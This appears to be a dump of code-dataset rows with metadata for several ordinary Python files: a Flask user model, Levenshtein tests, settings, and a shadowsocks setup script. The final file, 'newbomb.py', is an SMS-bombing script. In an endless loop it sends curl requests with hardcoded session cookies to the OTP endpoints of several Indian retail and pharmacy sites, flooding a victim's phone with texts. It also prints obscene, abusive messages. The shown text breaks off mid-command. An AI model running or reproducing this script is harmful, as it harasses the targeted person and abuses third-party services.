hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0cd3f8ef4188bc3e708721caf09a4b04d214fa3a | 82 | py | Python | src/__init__.py | TNCT-Mechatech/SerialBridgePython | 65fee93efb7ce3b37c21ca473eabf1b00b024fb8 | [
"Apache-2.0"
] | 1 | 2021-06-19T05:59:55.000Z | 2021-06-19T05:59:55.000Z | src/__init__.py | TNCT-Mechatech/SerialBridgePython | 65fee93efb7ce3b37c21ca473eabf1b00b024fb8 | [
"Apache-2.0"
] | 9 | 2021-04-05T07:32:15.000Z | 2021-07-08T01:40:30.000Z | src/__init__.py | TNCT-Mechatech/SerialBridgePython | 65fee93efb7ce3b37c21ca473eabf1b00b024fb8 | [
"Apache-2.0"
] | 1 | 2021-07-08T07:56:36.000Z | 2021-07-08T07:56:36.000Z | #! /usr/bin/env python
from src.message import *
from src.serial_bridge import *
| 16.4 | 31 | 0.743902 | 13 | 82 | 4.615385 | 0.769231 | 0.233333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.146341 | 82 | 4 | 32 | 20.5 | 0.857143 | 0.256098 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0b44d11d6e1217ae37215e2eb381e28c0f05e589 | 1,925 | py | Python | app/modules/auth/models.py | UnoYakshi/DebtCollector | ae101301c0f3e20e24368607c501eca5b319ad98 | [
"MIT"
] | null | null | null | app/modules/auth/models.py | UnoYakshi/DebtCollector | ae101301c0f3e20e24368607c501eca5b319ad98 | [
"MIT"
] | null | null | null | app/modules/auth/models.py | UnoYakshi/DebtCollector | ae101301c0f3e20e24368607c501eca5b319ad98 | [
"MIT"
] | null | null | null | #! ~DebtCollector/app/modules/auth/models.py
#from flask_sqlalchemy import SQLAlchemy
from werkzeug import generate_password_hash, check_password_hash
import json
from datetime import datetime, date
from app import db, bcrypt
class Users(db.Model):
__tablename__ = 'users'
id = db.Column('id', db.Integer, primary_key=True, autoincrement=True)
login = db.Column('login', db.String(32), unique=True, index=True)
first_name = db.Column('first_name', db.String(128))
last_name = db.Column('last_name', db.String(128))
email = db.Column('email', db.String(128), unique=True, index=True)
pwdhash = db.Column('pwdhash', db.String(128), unique=True)
birthdate = db.Column('birthdate', db.Date())
def __init__(self, login, first_name, last_name, email, password, birthdate):
self.login = login
self.first_name = first_name
self.last_name = last_name
self.email = email
self.pwdhash = bcrypt.generate_password_hash(password)
self.birthdate = birthdate
def is_authenticated(self):
return True
def is_active(self):
return True
def is_anonymous(self):
return False
def get_id(self):
return str(self.id)
def __repr__(self):
return '<User %r>' % (self.login)
def check_password(self, password):
return check_password_hash(self.pwdhash, password)
# TODO :: Make to_json/as_dict automated, but considering datetime and hash...
def to_json(self):
return {
'id': self.id,
'login': self.login,
'first_name': self.first_name,
'last_name': self.last_name,
'email': self.email,
'birthdate': self.birthdate
}
def as_dict(self):
return json.dumps({c.name: (c.name.isoformat()) if (type(c) in (datetime, date)) else (getattr(self, c.name)) for c in self.__table__.columns})
| 32.627119 | 151 | 0.650909 | 255 | 1,925 | 4.721569 | 0.301961 | 0.046512 | 0.036545 | 0.031561 | 0.066445 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009421 | 0.228052 | 1,925 | 58 | 152 | 33.189655 | 0.800808 | 0.082597 | 0 | 0.046512 | 1 | 0 | 0.057289 | 0 | 0 | 0 | 0 | 0.017241 | 0 | 1 | 0.209302 | false | 0.116279 | 0.093023 | 0.186047 | 0.697674 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 6 |
0b47d70f44921f04a904fb3a7842bcbebca33837 | 657 | py | Python | tests/algorithm_tests.py | SergeyKonnov/walbot | 28923523299bd18b47074915c8209833683d0b8c | [
"MIT"
] | 2 | 2021-01-14T22:17:59.000Z | 2021-12-31T11:18:21.000Z | tests/algorithm_tests.py | SergeyKonnov/walbot | 28923523299bd18b47074915c8209833683d0b8c | [
"MIT"
] | 221 | 2020-01-31T15:04:48.000Z | 2022-01-15T12:03:13.000Z | tests/algorithm_tests.py | aobolensk/walbot | f11ee6971b232cdb177284933528730b70ec67ca | [
"MIT"
] | 1 | 2019-11-26T18:18:46.000Z | 2019-11-26T18:18:46.000Z | from src.algorithms import levenshtein_distance
def test_levenshtein_distance_from_equal_strings():
assert levenshtein_distance("abc", "abc") == 0
def test_levenshtein_distance_difference_1():
assert levenshtein_distance("aac", "abc") == 1
assert levenshtein_distance("abc", "aac") == 1
def test_levenshtein_distance_different_length():
assert levenshtein_distance("ab", "abc") == 1
assert levenshtein_distance("abc", "ab") == 1
assert levenshtein_distance("a", "abc") == 2
assert levenshtein_distance("abc", "a") == 2
def test_levenshtein_distance_swapped_letters():
assert levenshtein_distance("help", "hepl") == 2
| 29.863636 | 52 | 0.730594 | 79 | 657 | 5.746835 | 0.316456 | 0.544053 | 0.440529 | 0.229075 | 0.140969 | 0.140969 | 0 | 0 | 0 | 0 | 0 | 0.015929 | 0.14003 | 657 | 21 | 53 | 31.285714 | 0.787611 | 0 | 0 | 0 | 0 | 0 | 0.066971 | 0 | 0 | 0 | 0 | 0 | 0.615385 | 1 | 0.307692 | true | 0 | 0.076923 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0b4a11ab18a3d74885fae4e8989f83e0be9328eb | 267 | py | Python | tests/bootstrap_tests.py | reddit/cabot-alert-pagerduty | 459c2bff53d4b947ab14178eae9d6b6c5068a145 | [
"MIT"
] | 1 | 2020-07-31T12:59:34.000Z | 2020-07-31T12:59:34.000Z | tests/bootstrap_tests.py | reddit/cabot-alert-pagerduty | 459c2bff53d4b947ab14178eae9d6b6c5068a145 | [
"MIT"
] | null | null | null | tests/bootstrap_tests.py | reddit/cabot-alert-pagerduty | 459c2bff53d4b947ab14178eae9d6b6c5068a145 | [
"MIT"
] | 4 | 2017-06-02T00:34:38.000Z | 2021-04-08T10:57:21.000Z | # -*- coding: utf-8 -*-
from django.conf import settings
settings.configure()
settings.JENKINS_USER = 'Test'
settings.JENKINS_PASS = 'Test'
settings.GRAPHITE_API = 'Test'
settings.GRAPHITE_USER = 'Test'
settings.GRAPHITE_PASS = 'Test'
settings.GRAPHITE_FROM = 'Test'
| 26.7 | 32 | 0.756554 | 34 | 267 | 5.764706 | 0.441176 | 0.306122 | 0.408163 | 0.244898 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004184 | 0.104869 | 267 | 9 | 33 | 29.666667 | 0.8159 | 0.078652 | 0 | 0 | 0 | 0 | 0.098361 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.25 | 0.125 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
0b793a3bfbf15bb23c8cabf6ead46fe07580c775 | 92 | py | Python | scrapers/Library/__init__.py | arifer612/MDLPackage | 7f5b3d66fe4dd1eaf0ee7b2f054707af428109a9 | [
"MIT"
] | 1 | 2021-06-15T08:52:01.000Z | 2021-06-15T08:52:01.000Z | scrapers/Library/__init__.py | arifer612/MDLPackage | 7f5b3d66fe4dd1eaf0ee7b2f054707af428109a9 | [
"MIT"
] | 1 | 2022-01-31T06:33:30.000Z | 2022-02-03T09:58:54.000Z | scrapers/Library/__init__.py | arifer612/MDLPackage | 7f5b3d66fe4dd1eaf0ee7b2f054707af428109a9 | [
"MIT"
] | 1 | 2021-08-12T22:35:09.000Z | 2021-08-12T22:35:09.000Z | from . import database
from . import tvTokyo
from . import tvOsaka
from . import YouTubeAPI
| 18.4 | 24 | 0.782609 | 12 | 92 | 6 | 0.5 | 0.555556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173913 | 92 | 4 | 25 | 23 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0ba03e51c93e1b0bf5831873e619c7ed83295674 | 191 | py | Python | budget/tests/test_budget.py | seanbreckenridge/mint | d19cb5cf28c584f3c3efe322fe154bea243a7eed | [
"MIT"
] | null | null | null | budget/tests/test_budget.py | seanbreckenridge/mint | d19cb5cf28c584f3c3efe322fe154bea243a7eed | [
"MIT"
] | 3 | 2021-03-15T09:48:30.000Z | 2022-02-14T06:02:01.000Z | budget/tests/test_budget.py | seanbreckenridge/mint | d19cb5cf28c584f3c3efe322fe154bea243a7eed | [
"MIT"
] | null | null | null | # just import stuff to make sure nothing is broken
def test_budget() -> None:
import budget.load.balances
import budget.load.transactions
import budget.analyze
assert True
| 19.1 | 50 | 0.727749 | 26 | 191 | 5.307692 | 0.730769 | 0.26087 | 0.231884 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.21466 | 191 | 9 | 51 | 21.222222 | 0.92 | 0.251309 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 1 | 0.2 | true | 0 | 0.6 | 0 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
e7e67f85af2fa5fe68fe9e15a41f9020e2759ee8 | 2,157 | py | Python | shadowsocks.py | yingxuanxuan/fabric_script | 7768c038b561ea5cd826edd24c5e2d53bc3a9cd0 | [
"Apache-2.0"
] | 1 | 2016-05-14T04:40:46.000Z | 2016-05-14T04:40:46.000Z | shadowsocks.py | yingxuanxuan/fabric_vultr | 7768c038b561ea5cd826edd24c5e2d53bc3a9cd0 | [
"Apache-2.0"
] | null | null | null | shadowsocks.py | yingxuanxuan/fabric_vultr | 7768c038b561ea5cd826edd24c5e2d53bc3a9cd0 | [
"Apache-2.0"
] | 1 | 2021-06-18T04:10:33.000Z | 2021-06-18T04:10:33.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
from fabric.api import reboot, sudo, settings
logging.basicConfig(level=logging.INFO)
def ssserver(port, password, method):
try:
sudo('hash yum')
sudo('hash python')
sudo('yum -y update 1>/dev/null')
sudo('yum -y install python-setuptools 1>/dev/null')
sudo('yum -y install m2crypto 1>/dev/null')
sudo('easy_install pip 1>/dev/null')
sudo('pip install shadowsocks 1>/dev/null')
sudo('hash ssserver')
sudo("sed -i '/ssserver/d' /etc/rc.d/rc.local")
cmd = '/usr/bin/python /usr/bin/ssserver -p %s -k %s -m %s --user nobody -d start' % \
(port, password, method)
sudo("sed -i '$a %s' /etc/rc.d/rc.local" % cmd)
sudo('chmod +x /etc/rc.d/rc.local')
sudo('firewall-cmd --zone=public --add-port=%s/tcp --permanent' % port)
with settings(warn_only=True):
reboot()
sudo('ps -ef | grep ssserver')
return True
except BaseException as e:
logging.error(e)
return False
def sslocal(server_addr, server_port, server_password, method, local_port):
try:
sudo('hash yum')
sudo('hash python')
sudo('yum -y update 1>/dev/null')
sudo('yum -y install python-setuptools 1>/dev/null')
sudo('yum -y install m2crypto 1>/dev/null')
sudo('easy_install pip 1>/dev/null')
sudo('pip install shadowsocks 1>/dev/null')
sudo('hash sslocal')
sudo("sed -i '/sslocal /d' /etc/rc.d/rc.local")
cmd = '/usr/bin/python /usr/bin/sslocal -s %s -p %s -k %s -m %s -b 0.0.0.0 -l %s --user nobody -d start' % \
(server_addr, server_port, server_password, method, local_port)
sudo("sed -i '$a %s' /etc/rc.d/rc.local" % cmd)
sudo('chmod +x /etc/rc.d/rc.local')
sudo('firewall-cmd --zone=public --add-port=%s/tcp --permanent' % local_port)
with settings(warn_only=True):
reboot()
sudo('ps -ef | grep sslocal')
return True
except BaseException as e:
logging.error(e)
return False
| 34.790323 | 116 | 0.578118 | 313 | 2,157 | 3.942492 | 0.255591 | 0.032415 | 0.06483 | 0.097245 | 0.793355 | 0.766613 | 0.756888 | 0.756888 | 0.756888 | 0.677472 | 0 | 0.010712 | 0.264256 | 2,157 | 61 | 117 | 35.360656 | 0.766856 | 0.019471 | 0 | 0.653061 | 0 | 0.040816 | 0.435873 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.040816 | false | 0.081633 | 0.040816 | 0 | 0.163265 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
f00da12a4b433dc22423bcc4f137a7f9c47129a6 | 80,788 | py | Python | newbomb.py | Cyber-Hades/sms_streak | 352e829e4dd15e94589465e464d11d189b211d55 | [
"Apache-2.0"
] | 9 | 2021-06-07T17:02:10.000Z | 2021-12-08T07:51:14.000Z | newbomb.py | Cyber-Hades/sms_streak | 352e829e4dd15e94589465e464d11d189b211d55 | [
"Apache-2.0"
] | null | null | null | newbomb.py | Cyber-Hades/sms_streak | 352e829e4dd15e94589465e464d11d189b211d55 | [
"Apache-2.0"
] | null | null | null | import os
import time
class Colours:
white = "\033[1;37m"
grey = "\033[0;37m"
purple = "\033[0;35m"
red = "\033[1;31m"
green = "\033[1;32m"
yellow = "\033[1;33m"
Cyan = "\033[0;36m"
Cafe = "\033[0;33m"
Fiuscha = "\033[0;35m"
blue = "\033[1;34m"
os.system("clear")
print("please rotate your screen to get a fully understandable ASCII")
time.sleep(3)
os.system("clear")
try:
time.sleep(2)
file = open("Banner.txt", "r")
if file.mode == "r":
contents = file.read()
print(Colours.red + contents)
except IOError:
print('Banner File not Found')
print("==================================================================================================")
print("|--------------------------------" + Colours.green + "[" + Colours.yellow + "Powerful Bombing Script" + Colours.green + "]" + Colours.red + "---|-----------------------------------|")
print("|------------------------------------------------------------|----" + Colours.yellow + "Made By" + Colours.red + "----" + Colours.green + "[" + Colours.yellow + "SRIVASTAV JI" + Colours.green + "]" + Colours.red + "--------|")
print("")
print(Colours.green + "[" + Colours.Cyan + ">" + Colours.green + "]" + "Note :" + Colours.yellow + " This tool is only for Educational purpose")
print(Colours.green + "[" + Colours.Cyan + ">" + Colours.green + "]" + "Author :" + Colours.yellow + " SRIVASTAV JI")
print(Colours.green + "[" + Colours.Cyan + ">" + Colours.green + "]" + "Instagram :" + Colours.yellow + " https://instagram.com/srivastav_ji_23")
print(Colours.green + "[" + Colours.Cyan + ">" + Colours.green + "]" + "Github :" + Colours.yellow + " https://github.com/Cyber-Hades/sms_streak")
print(Colours.red + "==================================================================================================")
print("")
print(Colours.green + "[" + Colours.yellow + "1" + Colours.green + "]" + Colours.blue + "LET'S START BOMB")
print(Colours.green + "[" + Colours.yellow + "2" + Colours.green + "]" + Colours.blue + "EXIT")
print()
print(Colours.green + "[" + Colours.yellow + "DATE" + Colours.green + "]" + Colours.yellow )
os.system("date")
print("")
try:
choose = int(input(
Colours.red + "┌─[" + Colours.green + "SRIVASTAV" + Colours.yellow + "@" + Colours.Cyan + "JI" + Colours.red + "]─[" + Colours.green + "SMS-STREAK" + Colours.red + "]\n"
"└──╼" + Colours.yellow + " # " + Colours.green + "Choose an option" + Colours.yellow + " >> " + Colours.green))
if choose == 1:
target = input(Colours.red + "┌─[" + Colours.green + "SRIVASTAV" + Colours.yellow + "@" + Colours.Cyan + "JI" + Colours.red + "]─[" + Colours.green + "SMS-STREAK" + Colours.red + "]\n"
"└──╼" + Colours.yellow + " # " + Colours.green + "Enter a number without code" + Colours.yellow + " >> " + Colours.green)
if target == "9874563210":
print(Colours.green + "[" + Colours.red + "-" + Colours.green + "] " + Colours.red + "Fuck you Daymn Jackass, Dont trynna Bomb my master CYBERMAFIA otherwise u will be fucked by a daymn street dog")
exit()
if target == "7894561230":
print(Colours.green + "[" + Colours.red + "-" + Colours.green + "] " + Colours.red + "Again you did that kind of shit , you fuckin Dickhead , Dont do this again")
time.sleep(3)
exit()
if target == "9564781302":
print(Colours.green + "[" + Colours.red + "-" + Colours.green + "] " + Colours.red + "What the hell man, Now a street dog comes and licks your mom's pussy")
time.sleep(3)
exit()
if target == "8779456221":
print(Colours.green + "[" + Colours.red + "-" + Colours.green + "] " + Colours.red + "XD you Bitch You Nigga, now u see how ur mom will feel the heaven in her bed with me")
time.sleep(3)
exit()
if target == "8759461032":
print(Colours.green + "[" + Colours.red + "-" + Colours.green + "] " + Colours.red + "Are you a Whore ?, Dont you see whose number is this you'll gonna be fucked up and i am taking your mom")
time.sleep(3)
exit()
else:
print(Colours.green + "[" + Colours.yellow + "+" +Colours.green + "]" + Colours.yellow + "Bombing started on specified number")
print(Colours.green + "[" + Colours.yellow + "+" +Colours.green + "]" + Colours.yellow + "press ctrl+z to stop then type exit to kill all jobs ")
while True:
os.system('''
curl -X POST -H "Host: www.fbbonline.in" -H "content-length: 435" -H "accept: application/json, text/javascript, */*; q=0.01" -H "x-newrelic-id: VQ8PVlFUChABV1ZRBgYCX1w=" -H "x-requested-with: XMLHttpRequest" -H "user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" -H "content-type: application/x-www-form-urlencoded; charset=UTF-8" -H "origin: https://www.fbbonline.in" -H "sec-fetch-site: same-origin" -H "sec-fetch-mode: cors" -H "sec-fetch-dest: empty" -H "referer: https://www.fbbonline.in/customer/account/checkoutcreate" -H "accept-encoding: gzip, deflate, br" -H "accept-language: en-US,en;q=0.9" -H "cookie: PHPSESSID=l79p1m44qqt2okvragufamej72" -H "cookie: _st_time=1601562961" -H "cookie: _fv=cmpnpp" -H "cookie: _fbp=fb.1.1601562989438.41952253" -H "cookie: activeCategories=s%3A12%3A%2240percentoff%22%3B" -H "cookie: activeFilters=s%3A27%3A%22%7B%22category%22%3A%2240percentoff%22%7D%22%3B" -H "cookie: rrUserId=8b9f6bf18b881409faee14f833956aca" -H "cookie: historyPlpPage=48" -H "cookie: scrollTopPosition=1" -H "cookie: historyProductCount=4"-H "cookie: historyProductSku=BU004TO76DQDINFUR" -H "cookie: historyPosition=1" -H "cookie: BU004TO76DQDINFUR_list=Polos" -H "cookie: pdSapSkus=s%3A155%3A%22%7B%22000001001496399001%22%3A%22XS%22%2C%22000001001496399002%22%3A%22S%22%2C%22000001001496399003%22%3A%22M%22%2C%22000001001496399004%22%3A%22L%22%2C%22000001001496399005%22%3A%22XL%22%2C%22000001001496399006%22%3A%22XXL%22%7D%22%3B" -H "cookie: recently_viewed_Sku=BU004TO76DQDINFUR" -H "cookie: all_store_details=null" -H "cookie: usr_crt=BU004TO76DQDINFUR-112646%3A1" -H "cookie: registration_url_cookie=https%3A%2F%2Fwww.fbbonline.in%2Fcustomer%2Faccount%2FcheckoutLogin" -d "YII_CSRF_TOKEN=5c5551174a88bdb2f2c2f2b02a492211701e0e8c&RegistrationForm%5Bsignup_page%5D=1&RegistrationForm%5Bcontact_number%5D='''+target+'''&RegistrationForm%5Bvalid_mobile%5D=1&RegistrationForm%5Bemail%5D=ezioaudi207%40gmail.com&RegistrationForm%5Bvalid_email%5D=1&RegistrationForm%5Bfirst_name%5D=Cyber&RegistrationForm%5Blast_name%5D=Mafia&RegistrationForm%5Bpassword%5D=cybermafia123&RegistrationForm%5Btc_opt_in%5D=on&validate_otp=" 'https://www.fbbonline.in/customer/account/GenerateOtp' > /dev/null 2>&1
''')
os.system('''
curl --http2 -X POST -H "Host:www.apollopharmacy.in" -H "content-length:17" -H "accept:*/*" -H "x-requested-with:XMLHttpRequest" -H "user-agent:Mozilla/5.0 (Linux; Android 10; CPH1933) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "origin:https://www.apollopharmacy.in" -H "sec-fetch-site:same-origin" -H "sec-fetch-mode:cors" -H "sec-fetch-dest:empty" -H "referer:https://www.apollopharmacy.in/sociallogin/mobile/login/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" -H "cookie:__cfduid=d98851bf93a8b640389d3448001b5a6361601659556" -H "cookie:PHPSESSID=5hi6on4q0uoomj7bhsl9846ce3" -H "cookie:_fbp=fb.1.1601659579198.1711590696" -H "cookie:__ta_device=vwcxwUYWQK6CjLE5qZfOO1jq1sIrSb1f" -H "cookie:__ta_visit=YsIgJNrxlThE7cK9qMyAAGRZdk6tswf7" -H "cookie:mage-translation-storage=%7B%7D" -H "cookie:mage-translation-file-version=%7B%7D" -H "cookie:__ta_ping=1" -H "cookie:mage-cache-storage=%7B%7D" -H "cookie:mage-cache-storage-section-invalidation=%7B%7D" -H "cookie:mage-cache-sessid=true" -H "cookie:mage-messages=" -H "cookie:section_data_ids=%7B%22customer%22%3A1601659380%2C%22compare-products%22%3A1601659380%2C%22last-ordered-items%22%3A1601659380%2C%22cart%22%3A1601660577%2C%22directory-data%22%3A1601659380%2C%22cadence-fbpixel-fpc%22%3A1601659380%2C%22review%22%3A1601659380%2C%22ammessages%22%3A1601659380%2C%22wishlist%22%3A1601659380%2C%22paypal-billing-agreement%22%3A1601659380%2C%22messages%22%3A1601660577%7D" -H "cookie:private_content_version=31193f5a756a200e2bcfd8a412d0f435" -H "cookie:AWSALB=ZCK07z5OGSQYuLfAHGqh467T00l+NIScVPXWs5s8f5hjvEoqawwouQiGidnvAY/lGoqzuyhC2+wATC4xbAy3u5VloSD8H7s8+7uXA3ecW3Ml7n49r1h36RUy2IrH" -H "cookie:AWSALBCORS=ZCK07z5OGSQYuLfAHGqh467T00l+NIScVPXWs5s8f5hjvEoqawwouQiGidnvAY/lGoqzuyhC2+wATC4xbAy3u5VloSD8H7s8+7uXA3ecW3Ml7n49r1h36RUy2IrH" -d "mobile='''+target+'''" "https://www.apollopharmacy.in/sociallogin/mobile/sendotp/" > /dev/null 2>&1
''')
os.system('''
curl --http2 -X POST -H "Host:grofers.com" -H "content-length:21" -H "app_client:consumer_web" -H "lon:77.040489" -H "device_id:90938812-ddb5-4d18-987b-60793f0776f1" -H "lat:28.4465616" -H "content-type:application/x-www-form-urlencoded" -H "user-agent:Mozilla/5.0 (Linux; Android 10; CPH1933) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Mobile Safari/537.36" -H "auth_key:ca9d7b061dddb979562082a366c427610f53fe8ef500dadc80f8b0caf7a549fc" -H "accept:*/*" -H "origin:https://grofers.com" -H "sec-fetch-site:same-origin" -H "sec-fetch-mode:cors" -H "sec-fetch-dest:empty" -H "referer:https://grofers.com/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" -H "cookie:__cfduid=d475e610ddc76074e6a50d5c6f91118df1601697005" -H "cookie:gr_1_deviceId=90938812-ddb5-4d18-987b-60793f0776f1" -H "cookie:city=" -H "cookie:__cfruid=f91298f1a33a801955b8d5466280379b9d26d7ea-1601697005" -H "cookie:gr_1_lat=28.4640810758775" -H "cookie:gr_1_lon=76.9942133969929" -H "cookie:gr_1_locality=1849" -H "cookie:ajs_anonymous_id=%22a58f3267-aae0-434d-be9c-ecdef450b407%22" -H "cookie:WZRK_S_RKR-99Z-ZK5Z=%7B%22p%22%3A1%7D" -d "user_phone='''+target+'''" "https://grofers.com/v2/accounts/" > /dev/null 2>&1
''')
os.system('''
